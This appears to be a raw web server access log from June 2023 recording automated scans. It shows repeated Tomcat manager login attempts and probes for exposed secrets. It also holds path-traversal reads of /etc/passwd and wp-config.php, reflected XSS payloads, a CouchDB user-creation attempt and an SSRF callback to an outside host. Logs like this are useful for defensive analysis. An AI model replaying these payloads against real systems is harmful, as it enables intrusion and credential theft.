107.189.31.184 - - [17/Jun/2023:17:58:25 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:17:59:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:00:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:00:48 +0530] "GET /config/getuser?index=0 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:18:00:48 +0530] "GET /config/getuser?index=0 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:18:01:18 +0530] "GET /user/sign_up HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:18:01:18 +0530] "GET /user/sign_up HTTP/1.1" 404 1018
198.98.53.107 - - [17/Jun/2023:18:01:28 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:18:02:09 +0530] "GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:18:02:10 +0530] "GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1" 404 1070
87.120.88.58 - - [17/Jun/2023:18:03:51 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:18:03:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:04:25 +0530] "GET /secrets.yml HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:18:04:27 +0530] "GET /secrets.yml HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:18:04:28 +0530] "GET /config/secrets.yml HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:18:04:29 +0530] "GET /config/secrets.yml HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:18:04:31 +0530] "GET /test/config/secrets.yml HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:18:04:31 +0530] "GET /test/config/secrets.yml HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:18:04:34 +0530] "GET /redmine/config/secrets.yml HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:18:04:34 +0530] "GET /redmine/config/secrets.yml HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:18:04:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:04:56 +0530] "GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1" 404 1170
107.189.31.184 - - [17/Jun/2023:18:04:57 +0530] "GET /wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1 HTTP/1.1" 404 1170
107.189.31.184 - - [17/Jun/2023:18:05:52 +0530] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:18:05:53 +0530] "PUT /_users/org.couchdb.user:poc HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:18:06:02 +0530] "GET /include/downmix.inc.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:18:06:02 +0530] "GET /include/downmix.inc.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:18:06:08 +0530] "GET /index.php/install HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:18:06:09 +0530] "GET /index.php/install HTTP/1.1" 404 1028
141.98.11.207 - - [17/Jun/2023:18:06:34 +0530] "GET / HTTP/1.1" 200 11250
141.98.11.207 - - [17/Jun/2023:18:06:38 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:18:08:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:09:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:12:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:13:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:14:04 +0530] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:18:14:04 +0530] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:18:14:12 +0530] "GET /systemController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd&down HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:18:14:13 +0530] "GET /systemController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd&down HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:18:14:14 +0530] "GET /systemController/showOrDownByurl.do?dbPath=../Windows/win.ini&down HTTP/1.1" 404 1064
107.189.31.184 - - [17/Jun/2023:18:14:15 +0530] "GET /systemController/showOrDownByurl.do?dbPath=../Windows/win.ini&down HTTP/1.1" 404 1064
90.151.171.108 - - [17/Jun/2023:18:14:20 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:18:14:20 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:18:14:25 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:18:14:25 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:18:14:30 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:18:14:30 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:18:14:35 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:18:14:35 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:18:15:49 +0530] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:18:15:50 +0530] "GET /cgi-bin/nobody/Search.cgi?action=scan HTTP/1.1" 404 1044
41.186.73.134 - - [17/Jun/2023:18:16:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:17:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:18:06 +0530] "GET /api/v1/repos/search?limit=1 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:18:18:07 +0530] "GET /api/v1/repos/search?limit=1 HTTP/1.1" 404 1032
185.180.143.79 - - [17/Jun/2023:18:18:25 +0530] "GET / HTTP/1.1" 200 11250
185.180.143.79 - - [17/Jun/2023:18:19:14 +0530] "GET /static/historypage.js HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:18:19:17 +0530] "GET /render.html?url=https://oast.live HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:18:19:18 +0530] "GET /render.html?url=https://oast.live HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:18:21:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:22:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:23:08 +0530] "GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:18:23:09 +0530] "GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:18:24:22 +0530] "GET /process/feries.php?fichier=../../../../../../../etc/passwd HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:18:24:23 +0530] "GET /process/feries.php?fichier=../../../../../../../etc/passwd HTTP/1.1" 404 1030
103.145.191.109 - - [17/Jun/2023:18:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:24:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:09 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:12 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:24 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:25 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:42 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:43 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:44 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:25:44 +0530] "GET /if.cgi?B_apply=APPLY&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282RHou2iPTAmkbePWk368Q4LkIkK%29%3C%2Fscript%3E&failure=fail.htm&max_tcp=3&radio_ping_block=0&redirect=setting.htm&type=ap_tcps_apply HTTP/1.1" 404 1006
103.145.191.109 - - [17/Jun/2023:18:25:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:18:25:45 +0530] "GET /if.cgi?B_apply=APPLY&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%282RHou2iPTAmkbePWk368Q4LkIkK%29%3C%2Fscript%3E&failure=fail.htm&max_tcp=3&radio_ping_block=0&redirect=setting.htm&type=ap_tcps_apply HTTP/1.1" 404 1006
103.145.191.109 - - [17/Jun/2023:18:25:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:18:25:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:25:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:18:26:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
